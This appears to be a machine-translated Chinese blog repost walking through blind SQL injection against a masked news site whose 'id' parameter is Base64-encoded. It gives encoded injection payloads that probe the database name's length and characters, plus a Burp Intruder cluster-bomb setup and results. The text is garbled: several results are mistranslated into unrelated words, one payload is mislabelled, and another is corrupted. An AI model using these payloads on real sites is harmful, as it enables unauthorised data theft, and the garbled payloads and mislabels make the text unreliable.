网址:http://www.xxxxx
xxx/newsdetail.php?id=MjgxOA==
确定参数Id有数字注入,我尝试了错误注入,但只能使用盲注。
Poc1:验证id=MTg4OS8x 等于id=1889/1。 poc2: id=MTg4OS8w 相当于id=1889/0。
/1
/0
使用ASCII码确定数据库名称长度(忘记截图了),确定数据库名称长度是5或者6,构建POC进一步确定数据库名称长度为6。
检查数据库名称长度:
Poc: id=MTg4OS9pZihsZW5ndGgoZGF0YWJhc2UoKSk9NiwxLDAp
等价: 1889/if(length(database())=6,1,0)
Poc: MS9pZihsZWZ0KGRhdGFiYXNlKCksMSk9J2EnLDEsMCk=
: 相当于1889/if(length(database())!=6,1,0)
接下来,可以直接构建POC并将其送入BPblast,但在blast之前,必须先进行Base64编码。
首先对除1和a之外的payload(需要扩展的参数)进行Base64编码。
有效负载:id=MTg4OS9pZihsZWZ0KGRhdGFiYXNlKCks1KT0naJywxLDAp
相当于1889/if(left(database(),1)=\’a\’,1,0)
选择Cluster Bomb 作为攻击类型,选择Base64 作为有效负载处理。
展开结果
有效负载1 有效负载2
分子量==aQ==
NQ==aQ==
NA==aQ==
MQ==AG==
NG==aQ==
镁==银==
然后进行编码转换,结果为:
支付1 支付2
3i
5i
4 我
1j
6 我
2j
#以上有关编码注入的相关内容来自网络,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92533.html